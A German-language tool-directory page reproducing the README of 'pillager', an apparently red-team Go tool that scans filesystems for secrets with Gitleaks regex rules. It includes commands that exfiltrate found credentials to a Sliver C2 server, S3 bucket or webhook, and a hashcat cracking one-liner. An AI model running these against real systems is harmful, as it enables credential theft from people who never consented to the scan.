Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
pillager — Plündere Dateisysteme nach sensiblen Informationen mit Go 🔍 | Kitploit
Tools/GitHubGitHub/brittonhayes/pillager
SchwachstellenscannerDatenexfiltrationInformationsbeschaffungPenetrationstestsDienstprogramme & FrameworksSecret-ErkennungRed Teaming
GitHubbrittonhayes/pillager

pillager

Plündere Dateisysteme nach sensiblen Informationen mit Go 🔍

Repository anzeigen
3112223vor 10 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Pillager

Go Reference Latest Release Go Report Card Tests

Durchsuche Dateisysteme mit Go nach sensiblen Informationen.

Inhaltsverzeichnis

  1. Zusammenfassung
  2. Installation
  3. Verwendung
  4. Exfiltration
  5. Dokumentation

Zusammenfassung

Pillager wurde entwickelt, um eine einfache Möglichkeit zu bieten, die starke Nebenläufigkeit von Go zu nutzen, um rekursiv Verzeichnisse nach sensiblen Informationen in Dateien zu durchsuchen. Pillager tut dies, indem es auf den Schultern einiger Giganten steht. Sobald Pillager Dateien findet, die dem angegebenen Muster entsprechen, wird die Datei mit einer Reihe von nebenläufigen Workern gescannt, die jeweils eine Zeile der Datei aus der Job-Warteschlange nehmen und nach sensiblen Musterübereinstimmungen suchen. Die verfügbaren Musterfilter können in einer pillager.toml-Datei definiert werden, oder Sie können das Standardregelwerk verwenden.

Installation

Go

Wenn Go auf Ihrem System eingerichtet ist, können Sie Pillager mit go install installieren.

go install github.com/brittonhayes/pillager@latest

Scoop (Windows)

scoop bucket add pillager https://github.com/brittonhayes/pillager-scoop.git
scoop install pillager

Homebrew (OSX/Linux)

brew tap brittonhayes/homebrew-pillager
brew install pillager

Docker-Image

docker run --rm -it ghcr.io/brittonhayes/pillager:latest hunt .

Wenn Sie nach einer Binärdatei suchen, überprüfen Sie die neuesten Releases auf die ausführbare Datei, die zu Ihrem System passt.

Verwendung

Um alle mit pillager verfügbaren Befehle zu sehen:

# Um Anweisungen für die gesamte Anwendung zu erhalten
pillager

# Von jedem Unterbefehl
pillager [cmd] --help

Benutzeroberfläche

Pillager bietet eine terminalbasierte Benutzeroberfläche, die mit bubbletea erstellt wurde, falls Sie interaktiv nach Geheimnissen suchen möchten.

asciicast

Exfiltration

Senden Sie entdeckte Geheimnisse an entfernte Ziele: Sliver C2 (Beute-/Anmeldedatenspeicher), S3/MinIO (Cloud-Speicher) oder Webhooks (benutzerdefinierte HTTP-Endpunkte).

# Sliver C2 - An Teamserver senden mit Credential-Parsing
pillager hunt /target --exfil sliver \
  --sliver-config ~/.sliver-client/configs/operator.cfg

# S3/MinIO - Hochladen mit Verschlüsselung
pillager hunt /target --exfil s3 \
  --s3-bucket red-team-findings \
  --s3-endpoint https://minio.internal:9000 \
  --exfil-encrypt env:EXFIL_KEY

# Webhook - POST an benutzerdefinierten Endpunkt
pillager hunt /target --exfil webhook \
  --webhook-url https://your-server.com/findings \
  --webhook-header "Authorization: Bearer token"

Sicherheit: AES-256-GCM-Verschlüsselung (--exfil-encrypt), TLS standardmäßig, automatische Metadaten (Hostname, Zeitstempel)


Konfiguration

Gitleaks-Regeln

Pillager bietet vollständige Unterstützung für Gitleaks[^2]-Regeln. Diese können entweder in einem rules1-Abschnitt in Ihrer pillager.toml-Datei übergeben werden, oder Sie können das Standardregelwerk verwenden, indem Sie das Konfigurations-Flag leer lassen.

# pillager.toml
# Grundlegende Konfiguration
verbose = false 
redact = false 

# Regeln zur Erkennung von Geheimnissen
[[rules]]
description = "AWS Access Key"
id = "aws-access-key"
regex = '''(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}'''
tags = ["aws", "credentials"]

[[rules]]
description = "AWS Secret Key"
id = "aws-secret-key"
regex = '''(?i)aws(.{0,20})?(?-i)['\"][0-9a-zA-Z\/+]{40}['\"]'''
tags = ["aws", "credentials"]

[[rules]]
description = "GitHub Token"
id = "github-token"
regex = '''ghp_[0-9a-zA-Z]{36}'''
tags = ["github", "token"]

[[rules]]
description = "Private Key"
id = "private-key"
regex = '''-----BEGIN (?:RSA|OPENSSH|DSA|EC|PGP) PRIVATE KEY( BLOCK)?-----'''
tags = ["key", "private"]

# Whitelist-Konfiguration
[allowlist]
paths = [
    ".*/_test\\.go$",
    ".*/testdata/.*",
    ".*\\.md$",
    ".*/vendor/.*"
]
regexes = [
    "EXAMPLE_KEY",
    "DUMMY_SECRET"
] 

Integrierte Ausgabeformate

Pillager bietet eine Reihe integrierter Ausgabeformate. Wählen Sie Ihr bevorzugtes!

Basic

pillager hunt .

JSON

pillager hunt ./example -f json | jq

Die JSON-Ausgabe ist so konzipiert, dass sie nahtlos mit dem großartigen jq-Tool für einfaches Parsen zusammenarbeitet.

Wortliste

# Verwenden Sie Pillager, um eine durch Zeilenumbrüche getrennte Wortliste aus den Funden zu generieren
pillager hunt . -f wordlist 
# Verwenden Sie Pillager, um eine Wortliste anzuhängen, und verwenden Sie dann Ihren bevorzugten Hashcat-Angriffsmodus
pillager hunt ./ -f wordlist >> rockyou.txt && hashcat -a 0 hash.txt rockyou.txt
Klicken Sie, um weitere Ausgabeformate anzuzeigen

JSON Pretty

pillager hunt . -f json-pretty

HTML

pillager hunt . -f html > results.html

Markdown

pillager hunt . -f markdown > results.md

CSV

pillager hunt . -f csv > results.csv

Benutzerdefinierte Go-Vorlage

pillager hunt . --template "{{ range .}}Secret: {{.Secret}}{{end}}"

Benutzerdefinierte Go-Vorlage aus Datei

pillager hunt . -t "$(cat mytemplate.tmpl)"

Benutzerdefinierte Vorlagen

Pillager ermöglicht die Verwendung leistungsstarker go text/template- und sprig-Funktionen, um das Ausgabeformat anzupassen. Hier sind einige Vorlagenbeispiele.

Basic

{{ range . -}}
    File: {{ .File }}
    Secret: {{ .Secret}}
    Description: {{ quote .Description }}
{{ end -}}

Markdown-Stil

# Ergebnisse

{{ range . -}}
    ## {{ .File }}
    - Ort: {{.StartLine}}
{{end}}

Weitere Vorlagenbeispiele finden Sie im Verzeichnis templates.

Dokumentation

GoDoc-Dokumentation ist auf pkg.go.dev für pillager verfügbar.

Entwicklung

Um an der Entwicklung von Funktionen und Fehlerbehebungen für Pillager teilzunehmen, beginnen Sie mit Folgendem:

  • Installieren Sie Go
  • Installieren Sie Taskfile.dev
  • Lesen Sie die CONTRIBUTING.MD

Schultern von Giganten ⭐

spf13's Cobra

Was ist Cobra?

Cobra ist eine Bibliothek, die eine einfache Schnittstelle zur Erstellung leistungsstarker moderner CLI-Schnittstellen ähnlich wie Git- und Go-Tools bietet. Cobra ist auch eine Anwendung, die Ihr Anwendungsgerüst generiert, um schnell eine Cobra-basierte Anwendung zu entwickeln.

Footnotes

  1. https://raw.githubusercontent.com/brittonhayes/pillager/main/%5BGitleaks-Regeln-Referenz%5D(https:/github.com/zricethezav/gitleaks/blob/57f9bc83d169bea363f2990a4de334b54efc3d7d/config/gitleaks.toml) ↩

Tool herunterladen